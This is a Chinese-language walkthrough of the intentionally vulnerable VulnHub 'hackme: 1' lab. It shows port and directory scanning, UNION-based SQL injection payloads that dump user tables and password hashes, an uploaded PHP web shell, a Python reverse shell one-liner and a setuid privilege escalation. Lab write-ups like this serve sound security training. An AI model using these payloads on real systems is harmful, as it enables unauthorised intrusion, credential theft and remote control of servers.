Vulnhub-Hackme
一、靶机搭建
选择扫描虚拟机

选择路径即可

二、信息收集
靶机信息
Name: hackme: 1
Date release: 18 Jul 2019
难度:初级,目标是通过web漏洞获得有限的权限访问,随后权限以root身份升级。这个实验室是为了模拟现实生活环境而创建的。
“hackme”使用DHCP,在mysqld可能自行关闭的情况下(非常罕见的情况),尝试强制重启机器,随后它应该可以正常工作。
hint:本节介绍已收集到的有关该版本的各种信息,例如网页和/或自述文件中的引文。
扫ip
靶机ip:192.168.108.150

扫开放端口和服务
开放了22和80端口

信息如下:
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
指纹探测
使用以下命令
nmap 192.168.108.150 -p 22,80 -sV -sC -O --version-all

信息如下:
运行系统: Linux 3.X|4.X
操作系统CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS 详情: Linux 3.2 - 4.9
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
目录扫描
先看看dirb扫描

试试dirsearch扫描

信息如下:
http://192.168.108.150/uploads #文件上传
http://192.168.108.150/config.php #配置信息
http://192.168.108.150/login.php #登录界面
http://192.168.108.150/logout.php #登出界面
http://192.168.108.150/register.php #注册界面
三、Web渗透
信息收集
主页面

由于其他页面无法正常访问,只有一个uploads,也没有什么可以利用的信息

回去注册一个账户并登录

是一个查询界面,查询书名

点击search先看看,看来有数据库,可能是sql注入

抓包看一下,存在注入点

sql注入
判断类型
无回显,看来需要注释符

是字符型注入

由于之前search查询出来的结果,该数据库存在三个字段
爆数据库名和版本号
-1' union select version(),database(),3#
数据库:webapphacking

爆表名
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema="webapphacking"#
数据表名称:books,users
- group_concat():将多行表的结果合并到一行
- information_schema.tables:是一个系统数据库,它存储了所有数据库、表、列等的元数据。在这里,攻击者查询的是
tables表,目的是获取所有表的名字。 - table_schema:指定数据库名称

爆users表下的列
获取users表的列名
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name="users"#
id,user,pasword,name,address
group_concat():将多行列的结果合并到一行
select group_concat(column_name),2,3:将结果输出全部在第一字段里,2和3是为了填充查询列,避免出错

获取users表下的用户和密码
-1' union select group_concat(user),group_concat(pasword),3 from users#
这里有很多用户以及他们密码的md5值,我们看比较重要的,superadmin,2386acb2cf356944177746fc92523983

查询一下,密码:Uncrackable

文件上传
重新登录

如下,有一个文件上传点,结合之前扫描出来的文件上传页面进行文件上传

访问uploads界面,可以正常上传,且可以访问

上传一个php文件,名为nc.php
track
<?php system($_GET["a"]); ?>
上传成功

执行一下系统命令试试,成功执行

文件上传反弹shell
kali开启监听

利用python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.108.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

反弹成功

四、提权
进入环境先信息收集一波,不过目录是web服务下的,没什么可用信息

进入/home 目录查看,发现两个可疑文件夹,hackme和legacy,访问hackme看看

存在两个可疑文件,但不知道怎么利用,进入另一个目录看看,发现一个脚本

- s:设置用户ID位(setuid),表示当用户执行这个文件时,进程将以文件所有者的权限运行。
ok,直接把提权脚本给我们了,执行该脚本

提权成功
Vulnhub-Hackme的更多相关文章
- Hackme: 1: Vulnhub Walkthrough
下载链接: https://www.vulnhub.com/entry/hackme-1,330/ 网络扫描探测: ╰─ nmap -p1-65535 -sV -A 10.10.202.131 22/ ...
- vulnhub writeup - 持续更新
目录 wakanda: 1 0. Description 1. flag1.txt 2. flag2.txt 3. flag3.txt Finished Tips Basic Pentesting: ...
- Vulnhub Breach1.0
1.靶机信息 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/C ...
- HA Joker Vulnhub Walkthrough
下载地址: https://www.vulnhub.com/entry/ha-joker,379/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.132Starti ...
- HA: ISRO Vulnhub Walkthrough
下载地址: https://www.vulnhub.com/entry/ha-isro,376/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.131Startin ...
- LAMPSecurity: CTF6 Vulnhub Walkthrough
镜像下载地址: https://www.vulnhub.com/entry/lampsecurity-ctf6,85/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202 ...
- Hacker Fest: 2019 Vulnhub Walkthrough
靶机地址: https://www.vulnhub.com/entry/hacker-fest-2019,378/ 主机扫描: FTP尝试匿名登录 应该是WordPress的站点 进行目录扫描: py ...
- DC8: Vulnhub Walkthrough
镜像下载链接: https://www.vulnhub.com/entry/dc-8,367/#download 主机扫描: http://10.10.202.131/?nid=2%27 http:/ ...
- HA: Infinity Stones Vulnhub Walkthrough
下载地址: https://www.vulnhub.com/entry/ha-infinity-stones,366/ 主机扫描: 目录枚举 我们按照密码规则生成字典:gam,%%@@2012 cru ...
- Sunset: Nightfall Vulnhub Walkthrough
靶机链接: https://www.vulnhub.com/entry/sunset-nightfall,355/ 主机扫描: ╰─ nmap -p- -A 10.10.202.162Starting ...
随机推荐
- 【报错解决】【Vue】与后端交互时,http与https跨域问题
问题 xhr.js:220 Mixed Content: The page at 'https://xxx' was loaded over HTTPS, but requested an insec ...
- 如何安装和使用 Latte Dock
你知道什么是"停靠区Dock" 吧,它通常是你的应用程序"停靠"的底栏,以便快速访问. 许多发行版和桌面环境都提供了某种停靠实现.如果你的发行版没有" ...
- Sublime Text 4143 激活码
1 .Windows激活方法 安装地址:Download - Sublime Text 使用浏览器打开hexed.it(https://hexed.it/) 点击"打开文件",选择 ...
- swagger 文件上传以及requestbody参数传递
swagger用来做普通的API测试很方便,在实际开发过程中,经常会有文件上传,或者通过reuestbody传递数据等方式. 这个时候swagger的配置就有一些特殊了 . swagger reque ...
- RedisTemplate配置的jackson.ObjectMapper里的一个enableDefaultTyping方法过期解决
1.前言 最近升级SpringBoot,从2.1.6版本升级到2.2.6版本,发现enableDefaultTyping方法过期过期了. 该方法是指定序列化输入的类型,就是将数据库里的数据安装一定类型 ...
- Anaconda下载安装及Spyder使用Python
第一:选择编程语言, C++ Java Python等,量化交易广泛使用Python开发策略. 第二:选择软件,Anaconda 或者 PyCharm,龙哥选用Anaconda,因为 Anaconda ...
- Qt/C++音视频开发50-不同ffmpeg版本之间的差异处理
一.前言 ffmpeg的版本众多,从2010年开始计算的项目的话,基本上还在使用的有ffmpeg2/3/4/5/6,最近几年版本彪的比较厉害,直接4/5/6,大版本之间接口有一些变化,特别是一些废弃接 ...
- 是时候弃用ibSass和node-sass而采用Dart Sass了!
背景说明 此次改动是在 Sass 核心团队进行了大量讨论之后,得出的结论,现在是时候正式宣布弃用 LibSass 和基于它构建的包(包括 Node Sass).多年来,LibSass 显然没有足够的工 ...
- DVWA靶场Command Injection(命令注入) 漏洞low(低),medium(中等),high(高)所有级别通关教程及源码审计
命令注入 命令注入漏洞是一种安全漏洞,攻击者可以通过向应用程序输入恶意命令,诱使系统执行这些命令,从而达到未授权访问.数据篡改.系统控制等目的.该漏洞通常出现在应用程序未对用户输入进行充分验证和清理时 ...
- CDS标准视图:设备 I_Equipment
视图名称:I_Equipment 视图类型:基础视图 视图内容: 设备编码和设备内容 设备来源及详细信息 有效期 事务代码: IE03,IH08 视图代码 点击查看代码 @EndUserText.la ...